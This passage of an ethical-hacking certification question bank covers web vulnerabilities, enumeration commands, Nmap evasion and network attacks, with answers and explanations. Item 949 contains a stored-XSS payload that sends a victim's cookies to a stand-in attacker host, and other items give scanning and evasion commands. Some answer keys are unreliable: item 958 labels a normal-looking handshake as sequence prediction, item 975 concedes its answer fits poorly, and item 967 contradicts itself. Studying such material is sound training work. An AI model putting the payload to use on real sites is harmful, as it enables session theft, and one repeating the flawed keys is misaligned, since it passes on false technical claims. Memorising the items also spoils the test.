The trap here is that candidates often assume WPA2-PSK is inherently insecure (Option B) or that revealing the BSSID is a risk (Option C), but the real security flaw in this scenario is the use of TKIP as the group cipher, which is deprecated and known to be broken.

How to eliminate wrong answers

Option A is wrong because CCMP (Counter Mode Cipher Block Chaining Message Authentication Code Protocol) is the most secure cipher available for WPA2, based on AES, and is not outdated. Option B is wrong because while WPA2-PSK can be cracked if a weak passphrase is used, the protocol itself is not 'easily cracked' — the vulnerability lies in the passphrase strength, not the protocol. Option C is wrong because the BSSID (Basic Service Set Identifier) is the MAC address of the access point and is always transmitted in beacon frames; revealing it is not a security risk as it is necessary for client devices to identify and connect to the network.

945
MCQ, medium

A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?

A. Reflected Cross-Site Scripting (XSS)
B. Command Injection
C. Cross-Site Request Forgery (CSRF)
D. Insecure Direct Object Reference (IDOR)
Answer: D

IDOR occurs when an application exposes references (e.g., user ID) and fails to verify authorization, allowing attackers to access other objects.

Why this answer

This is an Insecure Direct Object Reference (IDOR) vulnerability, where the application exposes internal object references (like user IDs) without proper access control checks.

946
MCQ, medium

A security analyst runs the command: `nbtstat -A 192.168.1.10`. The output shows the table of names for the remote machine. Which of the following is the MOST likely purpose of this command?

A. To perform a DNS zone transfer
B. To enumerate SNMP community strings on the remote host
C. To enumerate NetBIOS names and services on the remote host
D. To enumerate SMB shares on the remote host
Answer: C

nbtstat -A queries the NetBIOS name table of a remote machine.

Why this answer

nbtstat -A (with capital A) performs a NetBIOS name table lookup on a remote IP address, revealing computer names, logged-in users, and services.

947
MCQ, hard

During a vulnerability scan with Nessus, you find that port 445/TCP is open on a Windows server. Which of the following is the MOST likely associated risk?

A. SNMP community string brute-forcing
B. Remote code execution via SMB vulnerabilities
C. HTTP directory traversal
D. DNS cache poisoning
Answer: B

SMB on port 445 has known RCE vulnerabilities.

Why this answer

Port 445/TCP is used by Microsoft SMB (Server Message Block) over a direct TCP connection, commonly known as SMB over TCP. SMB has historically been plagued by critical remote code execution vulnerabilities, most notably EternalBlue (MS17-010) exploited by WannaCry. Therefore, an open SMB port on a Windows server presents a high risk of remote code execution if unpatched.

Exam trap

The trap here is that candidates may associate port 445 with file sharing only and overlook its history of critical remote code execution vulnerabilities, instead choosing a more generic or unrelated attack vector like HTTP directory traversal.

How to eliminate wrong answers

Option A is wrong because SNMP community string brute-forcing targets UDP ports 161/162, not TCP port 445. Option C is wrong because HTTP directory traversal exploits web servers on ports 80/443/TCP, not the SMB port. Option D is wrong because DNS cache poisoning attacks target DNS servers on UDP/TCP port 53, not port 445.

948
MCQ, medium

A security analyst reviews the following command output from a Linux system: `uid=0(root) gid=0(root) groups=0(root)`. The analyst suspects a privilege escalation attack. Which of the following techniques could have been used to achieve root access from a standard user account?

A. Token impersonation
B. Pass-the-hash attack
C. LLMNR/NBT-NS poisoning
D. SUID/GUID abuse
Answer: D

Exploiting a SUID binary can elevate privileges to root.

Why this answer

The command output shows the current user has UID 0, which is the root user. On Linux, SUID (Set User ID) and GUID (Group ID) bits allow executables to run with the permissions of the file owner (e.g., root). A standard user can exploit a misconfigured SUID binary (like `passwd` or a custom script) to execute commands with root privileges, achieving privilege escalation.

This is a classic Linux privilege escalation technique directly tied to the UID/GID output shown.

Exam trap

The trap here is that candidates confuse Windows-specific attacks (token impersonation, pass-the-hash, LLMNR poisoning) with Linux privilege escalation, failing to recognize that the `uid=0` output is a direct indicator of root access achieved via SUID/GUID abuse.

How to eliminate wrong answers

Option A is wrong because token impersonation is a Windows-specific attack that involves duplicating access tokens (e.g., via SeImpersonatePrivilege) and does not apply to Linux systems. Option B is wrong because pass-the-hash is a Windows network authentication attack that reuses NTLM hashes to authenticate without knowing the plaintext password; it is not relevant to Linux local privilege escalation. Option C is wrong because LLMNR/NBT-NS poisoning is a Windows network protocol attack used to intercept authentication requests on a local network, not a technique to escalate privileges on a local Linux system.

949
MCQ, medium

A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: `<script>document.location='http://attacker.com/?c='+document.cookie</script>`. When an admin views the public page, the script executes. Which type of attack occurred?

A. Reflected XSS
B. Cross-site request forgery (CSRF)
C. DOM-based XSS
D. Stored XSS
Answer: D

The malicious script is stored in the feedback database and executed when the admin retrieves it.

Why this answer

The script is stored on the server (feedback) and executed when the admin views the page. This is persistent (stored) XSS.

950
MCQ, easy

Which of the following is a primary purpose of the enumeration phase in a penetration test?

A. To gather in-depth information about the target system and its resources
B. To exploit identified vulnerabilities and gain access
C. To perform a vulnerability scan on the target network
D. To delete logs and cover tracks after a successful compromise
Answer: A

Enumeration focuses on extracting information like usernames, shares, services, and other details that can be used for exploitation.

Why this answer

Enumeration is the process of extracting detailed information about a target, such as user accounts, network shares, and services, which is used to identify potential attack vectors.

951
MCQ, easy

Refer to the exhibit. An attacker runs the nslookup command shown. What information has been gathered?

A. Mail server addresses and priority
B. Name server records
C. IP addresses of the web server
D. SPF records for email authentication
Answer: A

MX records show mail servers and their priority.

Why this answer

The nslookup command with the -type=MX query returns mail exchange (MX) records for the domain. The output shows mail server hostnames and their associated priority values (e.g., 10, 20), which indicate the order in which mail servers should be used. This directly reveals the mail server addresses and their priority, making option A correct.

Exam trap

The trap here is that candidates confuse DNS record types—specifically, they may think MX records return IP addresses or SPF data, when in fact MX only returns mail server hostnames and priorities.

How to eliminate wrong answers

Option B is wrong because name server (NS) records are retrieved using -type=NS, not -type=MX; the output shows no NS records. Option C is wrong because IP addresses of the web server are obtained via A or AAAA records, not MX records; MX records only provide mail server hostnames, not web server IPs. Option D is wrong because SPF records are stored as TXT records, not MX records; the -type=MX query does not return SPF data.

952
MCQ, hard

A security engineer observes the following log event: 'Certificate for www.example.com was issued by an intermediate CA that chains to a root CA not in the trusted store.' Which type of attack might this indicate?

A. Birthday attack on the certificate signature
B. Downgrade attack to SSLv3
C. Man-in-the-middle using a rogue certificate
D. Replay attack on the TLS handshake
Answer: C

An untrusted root CA indicates the certificate is not validated, which could be from an attacker's proxy issuing its own cert.

Why this answer

A certificate from an untrusted root CA suggests a rogue or misissued certificate, possibly from a malicious CA or a man-in-the-middle attack using a proxy with its own CA certificate not trusted by the client.

953
MCQ, medium

A penetration tester is performing SNMP enumeration against a network device and wants to retrieve the entire Management Information Base (MIB) tree. Which command should they use?

A. `snmpwalk -v 2c -c public 192.168.1.1 .1`
B. `snmpset -v 2c -c private 192.168.1.1 1.3.6.1.2.1.1.0 s 'test'`
C. `snmpbulkwalk -v 2c -c public 192.168.1.1 .1`
D. `snmpget -v 2c -c public 192.168.1.1 1.3.6.1.2.1.1`
Answer: A

snmpwalk with .1 as the starting OID will walk the entire MIB tree, retrieving all values.

Why this answer

Option A is correct because `snmpwalk` is specifically designed to retrieve a subtree of MIB objects by performing a series of GETNEXT requests starting from a given OID. Using `.1` as the root OID (which corresponds to the entire ISO tree) with the SNMPv2c community string 'public' will enumerate all accessible OIDs in the MIB tree, effectively dumping the entire Management Information Base.

Exam trap

The trap here is that candidates often confuse `snmpbulkwalk` as the correct answer because it is faster for large MIBs, but the CEH exam expects `snmpwalk` as the standard enumeration tool, and `snmpbulkwalk` may not be supported by all SNMP agents.

How to eliminate wrong answers

Option B is wrong because `snmpset` is used to modify SNMP objects, not to retrieve them; it requires write access (community 'private') and would fail to enumerate the MIB tree. Option C is wrong because `snmpbulkwalk` is optimized for bulk retrieval but is not the standard command for a full MIB tree walk; it uses GETBULK requests which may be blocked or behave differently on some devices, and the question asks for the command to use, not the most efficient one. Option D is wrong because `snmpget` retrieves only a single OID value (1.3.6.1.2.1.1) and does not walk the tree; it would return only the system description or a single scalar object, not the entire MIB.

954
Multi-Select, medium

Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)

Select 2 answers
A. The attack is typically delivered through a crafted link
B. The script executes in the server-side context
C. The attack affects all users who visit the compromised page without any interaction
D. The malicious script is reflected off the web server in the response
E. The malicious script is permanently stored on the server
Answers: A, D

Reflected XSS often requires the victim to click a malicious link.

Why this answer

Reflected XSS requires user interaction (clicking a link) and does not persist on the server.

955
MCQ, hard

An analyst reviews a web server log and sees the following request: `GET /search?q=<script>alert('xss')</script> HTTP/1.1`. The response from the server includes the search term inside a `<div>` tag without any sanitization. Which type of XSS vulnerability does this indicate?

A. Stored XSS
B. Reflected XSS
C. DOM-based XSS
D. Blind XSS
Answer: B

The script is injected via a URL parameter and immediately reflected in the server's response, which is the definition of reflected XSS.

Why this answer

This is a typical reflected XSS because the malicious script is injected via a GET parameter and immediately reflected in the response without persistent storage.

956
MCQ, medium

An attacker uses the Social Engineering Toolkit (SET) to clone a legitimate website and send a malicious link to employees. When an employee clicks the link, they are prompted to enter their credentials. Which attack is this?

A. SMiShing
B. Spear phishing
C. Vishing
D. Phishing
Answer: D

Phishing uses fake websites and emails to trick victims into revealing credentials.

Why this answer

Phishing involves sending fraudulent communications that appear to come from a reputable source, often via email, to steal credentials. SET is commonly used for phishing campaigns.

957
MCQ, medium

During a security assessment, an analyst runs 'enum4linux -a 10.0.0.5' and obtains a list of users, shares, and OS information. What protocol is enum4linux primarily using to gather this information?

A. NetBIOS
B. SNMP
C. LDAP
D. SMB/CIFS
Answer: D

enum4linux leverages SMB/CIFS protocol to query Windows shares, users, and OS details.

Why this answer

enum4linux is a wrapper around tools from the Samba suite, primarily using the SMB/CIFS protocol to query Windows systems for information such as user lists, shares, and OS details. It leverages SMB's remote IPC mechanisms (e.g., via \pipe\lsarpc or \pipe\samr) to enumerate these data points, making D the correct answer.

Exam trap

The trap here is that candidates confuse the underlying protocol (SMB/CIFS) with the transport or name-resolution layer (NetBIOS), leading them to select Option A because enum4linux historically used NetBIOS name lookups, but the core enumeration protocol is SMB/CIFS.

How to eliminate wrong answers

Option A is wrong because NetBIOS is a session-layer protocol used for name resolution and service discovery, but enum4linux relies on SMB/CIFS over TCP/445 (or NetBIOS over TCP/139) to perform its enumeration; the tool itself is not primarily a NetBIOS scanner. Option B is wrong because SNMP (Simple Network Management Protocol) uses UDP ports 161/162 and is designed for managing network devices, not for enumerating Windows user accounts or shares via SMB. Option C is wrong because LDAP (Lightweight Directory Access Protocol) operates on TCP/389 and is used for querying directory services like Active Directory, but enum4linux does not use LDAP by default; it uses SMB RPC calls to extract information.

958
MCQ, hard

An analyst observes the following output from Wireshark: a TCP packet with the SYN flag set, followed by a SYN-ACK, then an ACK, and then a RST. The sequence numbers show a pattern: initial seq=100, ack=300, then seq=300, ack=101. What is the MOST likely interpretation?

A. An attacker is performing TCP sequence prediction to hijack the session.
B. A normal TCP connection establishment followed by an immediate termination.
C. A man-in-the-middle attack using ARP spoofing.
D. A TCP SYN flood attack is in progress.
Answer: A

Correct. The sequence numbers show successful prediction, and the RST may be used to reset the connection after hijacking.

Why this answer

The sequence numbers (100, 300) suggest the attacker correctly guessed the TCP sequence numbers to spoof a connection. The three-way handshake completes (SYN, SYN-ACK, ACK), then the attacker sends a RST to close. This is indicative of a TCP sequence prediction attack (session hijacking attempt).

959
MCQ, medium

A penetration tester wants to identify live hosts on a large IP range without generating excessive network traffic. Which tool is BEST suited for fast host discovery?

A. Masscan
B. Maltego
C. dnsenum
D. Nessus
Answer: A

Masscan is designed for high-speed scanning of large address spaces.

Why this answer

Masscan is the best tool for fast host discovery across large IP ranges because it uses asynchronous transmission and can scan the entire IPv4 address space in under 10 minutes at a rate of 10 million packets per second. It minimizes network traffic by sending only SYN packets and not completing the TCP handshake, making it ideal for rapid live host detection without overwhelming the network.

Exam trap

The trap here is that candidates confuse 'host discovery' with 'vulnerability scanning' or 'OSINT gathering', leading them to choose Nessus or Maltego, but the question specifically asks for minimal traffic and speed, which only Masscan's asynchronous SYN scan achieves.

How to eliminate wrong answers

Option B is wrong because Maltego is a graphical link analysis tool for gathering and correlating open-source intelligence (OSINT), not a network scanner for live host discovery; it relies on existing data sources rather than sending packets. Option C is wrong because dnsenum is a DNS enumeration tool that queries DNS servers for subdomains and records, not a host discovery scanner; it does not send raw packets to probe IP addresses. Option D is wrong because Nessus is a comprehensive vulnerability scanner that performs deep, multi-packet scans with full handshakes and plugin checks, generating heavy traffic and taking much longer than needed for simple host discovery.

960
MCQ (medium)

A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?

A. Use Wireshark to monitor for floods
B. Disable CAM table learning
C. Enable port security on switches
D. Implement ARP spoofing detection
Answer: C

Correct. Port security restricts the number of MAC addresses per switch port.

Why this answer

MAC flooding tries to overflow the switch's MAC address table, causing it to act like a hub. Port security limits the number of MAC addresses per port, preventing flooding.

961
MCQ (medium)

During a penetration test, an analyst runs the command 'snmpwalk -v2c -c public 192.168.1.10' and receives a large amount of output. Which protocol and community string are being used?

A. SNMPv1 with community string public
B. SNMPv1 with community string private
C. SNMPv2c with community string public
D. SNMPv3 with user public
Answer: C

The flags -v2c and -c public correctly identify SNMP version 2c and community string public.

Why this answer

The command 'snmpwalk -v2c -c public 192.168.1.10' explicitly specifies SNMP version 2c with the '-v2c' flag and the community string 'public' with the '-c' flag. SNMPv2c is the most common version for read-only queries, and 'public' is the default read-only community string. The large output indicates successful enumeration of the MIB tree, confirming the community string is correct.

Exam trap

The trap here is that candidates often confuse the '-v2c' flag with SNMPv1 or assume 'public' is always read-only, but the question tests the direct mapping of command-line arguments to protocol version and community string.

How to eliminate wrong answers

Option A is wrong because the command uses '-v2c', not '-v1', so SNMPv1 is not being used. Option B is wrong because it incorrectly specifies SNMPv1 and the community string 'private', which is typically used for read-write access, not the 'public' string shown in the command. Option D is wrong because SNMPv3 does not use community strings; it uses usernames and authentication/encryption parameters, and the command does not include any SNMPv3-specific flags like '-u' or '-l'.

962
MCQ (hard)

During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?

A. Macro virus
B. File infector virus
C. Boot sector virus
D. Polymorphic virus
Answer: D

Polymorphic viruses change their code signature using encryption and mutation engines.

Why this answer

A polymorphic virus mutates its code (often using encryption) while preserving its functionality, producing different signatures with each infection.

963
MCQ (medium)

A security analyst runs `nmap -sS -sV -A 192.168.1.100` and obtains open ports and service versions. However, the analyst suspects the target is behind an IDS/IPS. Which Nmap technique would BEST evade detection while still performing a similar scan?

A. Add -f to fragment IP packets
B. Use -sT instead of -sS to perform a full TCP connect scan
C. Increase timing to -T5 for a faster scan
D. Replace -sV with -sU to scan UDP services
Answer: A

Fragmentation can evade simple packet inspection by IDS/IPS.

Why this answer

Option A is correct because using the `-f` flag fragments the IP packets, splitting the TCP header across multiple packets. This helps evade simple IDS/IPS signatures that rely on detecting a complete SYN scan in a single packet, as the fragmented packets may bypass pattern-matching rules or reassembly buffers.

Exam trap

EC-Council often tests the misconception that faster scans (`-T5`) are stealthier, when in reality they increase noise and detection risk, while fragmentation (`-f`) is a recognized evasion technique for bypassing packet inspection.

How to eliminate wrong answers

Option B is wrong because `-sT` performs a full TCP connect scan, which completes the three-way handshake and is more likely to be logged by the target system and detected by IDS/IPS due to the completed connections. Option C is wrong because increasing timing to `-T5` sends packets faster, which can actually increase the likelihood of detection by IDS/IPS due to abnormal traffic patterns or rate-based alerts. Option D is wrong because replacing `-sV` with `-sU` changes the scan type to UDP, which does not perform the same service version detection and is not a technique for evading detection; it simply scans different protocols.

964
Multi-Select (medium)

Which TWO of the following are characteristics of a DNS amplification attack? (Select 2)

Select 2 answers
A. It targets the victim's MAC address
B. It uses spoofed source IP addresses
C. It exploits open DNS resolvers
D. It requires the attacker to be on the same subnet as the victim
E. It uses ICMP echo requests
Answers: B, C

Spoofed IPs direct responses to the victim.

Why this answer

DNS amplification uses open resolvers and spoofed source IPs to send small queries that yield large responses, amplifying traffic.

965
MCQ (easy)

Which type of malware is characterized by self-replication and spreading across networks without needing a host file?

A. Trojan
B. Worm
C. Ransomware
D. Virus
Answer: B

Correct. Worms are self-replicating and spread without a host.

Why this answer

Worms are standalone programs that replicate and spread independently, often exploiting network vulnerabilities.

966
MCQ (easy)

An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?

A. CSRF
B. XXE
C. SSRF
D. IDOR
Answer: C

SSRF involves the server making unintended requests to internal or external systems.

Why this answer

SSRF (Server-Side Request Forgery) occurs when an attacker can induce the server to make requests to internal resources.

967
MCQ (medium)

During a reconnaissance phase, a penetration tester uses Shodan to search for devices with a specific open port. Which of the following BEST describes what Shodan provides beyond a simple port scan?

A. Real-time network traffic analysis
B. Passive DNS records and domain registration details
C. Banner information and service metadata from internet-connected devices
D. Historical vulnerability data for each device
Answer: C

Shodan's main feature is gathering banner information and metadata from scanned services.

Why this answer

Shodan is a search engine for internet-connected devices that actively probes IP addresses and collects banner information—the metadata that services (e.g., HTTP, SSH, FTP) return upon connection. This includes server headers, version strings, default credentials, and other service fingerprints, which goes far beyond a simple port scan that only reports whether a port is open or closed.

Exam trap

The trap here is that candidates confuse Shodan's banner-grabbing capability with a vulnerability scanner, assuming it provides historical CVE data, when in fact Shodan only shows the current service fingerprint and does not automatically map it to vulnerabilities.

How to eliminate wrong answers

Option A is wrong because Shodan does not perform real-time network traffic analysis; it uses periodic, active probing to collect static snapshots of service banners, not live packet captures or flow data. Option B is wrong because passive DNS records and domain registration details are the domain of tools like whois, SecurityTrails, or DNSdumpster, not Shodan—Shodan focuses on IP-level service metadata, not domain-level ownership or DNS history. Option D is wrong because Shodan does not provide historical vulnerability data for each device; while it may show the version of a service, it does not correlate that version with CVE databases or track patch history—that would require a separate vulnerability scanner or a platform like Shodan's own 'Vulnerabilities' feature (which is an add-on, not a core capability).

968
Multi-Select (medium)

Which TWO of the following tools are capable of cracking password hashes offline? (Select 2)

Select 2 answers
A. Hashcat
B. Hydra
C. John the Ripper
D. Nmap
E. Wireshark
Answers: A, C

Hashcat is a powerful offline password cracker supporting GPU acceleration.

Why this answer

John the Ripper and Hashcat are both offline password crackers. Hydra is for online attacks. Wireshark is a packet analyzer. Nmap is a network scanner.

969
Multi-Select (medium)

Which THREE of the following are common indicators of a buffer overflow vulnerability?

Select 3 answers
A. Unexpected program crashes or segmentation faults
B. Access violation errors when writing to memory
C. Use of return-oriented programming (ROP)
D. High CPU usage
E. Overwritten adjacent memory regions
Answers: A, B, E

Crashes often occur when memory is corrupted.

Why this answer

A is correct because buffer overflow vulnerabilities often cause unexpected program crashes or segmentation faults. When a program writes data beyond the allocated buffer size, it can corrupt the stack or heap, leading to invalid memory access that the operating system detects and terminates with a segmentation fault (SIGSEGV). This is a classic symptom of overwritten return addresses or other critical control data.

Exam trap

The trap here is that candidates confuse exploitation techniques (like ROP) with vulnerability indicators, but ROP is a post-exploitation method, not a sign that a buffer overflow exists.

970
Multi-Select (medium)

Which THREE of the following are common techniques used during the footprinting phase? (Choose three.)

Select 3 answers
A. Exploitation
B. Port scanning
C. WHOIS lookup
D. Google hacking
E. DNS zone transfer
Answers: C, D, E

WHOIS provides domain registration details.

Why this answer

WHOIS lookup is a footprinting technique that queries domain registration databases (e.g., whois.arin.net) to obtain registrant contact details, name servers, and registration dates. This information is publicly available and helps attackers map an organization's digital footprint without direct interaction with the target.

Exam trap

EC-Council often tests the distinction between footprinting (passive, non-intrusive) and scanning (active, intrusive), so candidates mistakenly classify port scanning or exploitation as footprinting techniques.

971
MCQ (easy)

A security analyst wants to discover all DNS records associated with a domain without triggering a full zone transfer. Which tool is BEST suited for this task?

A. theHarvester
B. dig
C. nslookup
D. dnsrecon
Answer: D

dnsrecon is a powerful DNS enumeration script that can query multiple record types and perform subdomain brute-forcing.

Why this answer

D (dnsrecon) is correct because it is a dedicated DNS enumeration tool that performs multiple types of DNS record queries (A, AAAA, CNAME, MX, NS, SOA, SRV, TXT, etc.) using techniques like brute-forcing subdomains and performing SRV record enumeration, all without attempting a full zone transfer (AXFR). It is specifically designed for reconnaissance and can discover hidden or non-obvious DNS records efficiently.

Exam trap

EC-Council often tests the misconception that nslookup or dig are sufficient for comprehensive DNS discovery, but the question specifically asks for a tool that discovers *all* DNS records without a zone transfer, which requires automated enumeration beyond single-query tools.

How to eliminate wrong answers

Option A (theHarvester) is wrong because it is primarily an email, subdomain, and open-source intelligence (OSINT) gathering tool that uses search engines and public sources, not direct DNS queries for all record types. Option B (dig) is wrong because while it can query individual DNS record types, it is a manual command-line tool that requires separate queries for each record type and does not automate the discovery of all DNS records in a single pass. Option C (nslookup) is wrong because it is an older, interactive DNS lookup utility that also requires manual, per-record queries and lacks the automated enumeration features of dnsrecon.

972
MCQ (easy)

Which of the following tools is specifically used to enumerate SMB shares and retrieve file listings from Windows systems?

A. ldapsearch
B. snmpwalk
C. smbclient
D. nmap
Answer: C

smbclient -L lists shares and can connect to them to browse files.

Why this answer

smbclient is a tool from the Samba suite specifically designed to interact with SMB/CIFS shares. It allows an attacker to enumerate available shares on a Windows target and retrieve file listings by connecting to the SMB service (port 445 or 139) using commands like 'smbclient -L //target' or by mounting a share and listing its contents.

Exam trap

The trap here is that candidates often confuse nmap's ability to detect SMB services with the actual enumeration of shares and file listings, but nmap requires specific NSE scripts and does not provide the direct interactive file listing capability that smbclient offers.

How to eliminate wrong answers

Option A is wrong because ldapsearch is a tool for querying LDAP directory services (port 389/636), not for enumerating SMB shares or retrieving file listings from Windows systems. Option B is wrong because snmpwalk is used to retrieve SNMP MIB data (port 161/162) from network devices, not to interact with SMB shares. Option D is wrong because nmap is a port scanner and network mapper that can detect open SMB ports but cannot natively enumerate SMB shares or retrieve file listings without additional scripts (e.g., smb-enum-shares), and even then it is not the dedicated tool for direct file listing.

973
MCQ (hard)

A security team suspects a session hijacking attack. The analyst examines network traffic and sees packets with sequence numbers that increment by predictable values. Which attack is MOST likely occurring?

A. TCP sequence prediction
B. ARP poisoning
C. DNS spoofing
D. MAC flooding
Answer: A

Predictable sequence numbers allow packet injection.

Why this answer

TCP session hijacking relies on predicting sequence numbers to inject packets.

974
MCQ (medium)

During a social engineering assessment, an attacker calls a help desk impersonating a new employee and requests a password reset due to a 'locked account'. The help desk complies. Which social engineering technique is being used?

A. Phishing
B. Vishing
C. Pretexting
D. Quid pro quo
Answer: C

Pretexting involves creating a false identity or scenario to trick the target.

Why this answer

Pretexting involves creating a fabricated scenario (pretext) to obtain information or action.

975
MCQ (medium)

A security analyst receives an alert indicating that a host on the internal network is sending a high volume of ICMP echo requests to multiple external IP addresses. The analyst notices that the source IP address is spoofed. Which type of attack is MOST likely occurring?

A. Fraggle attack
B. ICMP flood
C. Smurf attack
D. Ping flood
Answer: C

The Smurf attack sends spoofed ICMP echo requests to a network broadcast address, causing all hosts to reply to the victim. This fits the description.

Why this answer

A Smurf attack uses spoofed ICMP echo requests sent to a broadcast address, causing all hosts on the network to reply to the victim. However, the scenario describes requests sent to multiple external IPs, which is more characteristic of an ICMP-based DDoS amplification attack; given the options, Smurf is the closest match because it involves ICMP and a spoofed source.

A ping flood is a simpler flood that does not necessarily involve spoofing, and a Fraggle attack uses UDP rather than ICMP. Therefore, Smurf is correct.
